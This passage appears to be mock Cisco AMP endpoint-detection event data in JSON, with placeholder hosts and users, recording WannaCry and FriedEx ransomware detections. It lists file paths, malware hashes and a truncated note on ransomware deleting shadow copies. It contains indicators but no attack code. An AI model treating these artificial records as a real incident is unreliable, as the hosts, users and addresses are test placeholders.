Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":251000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3808,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious 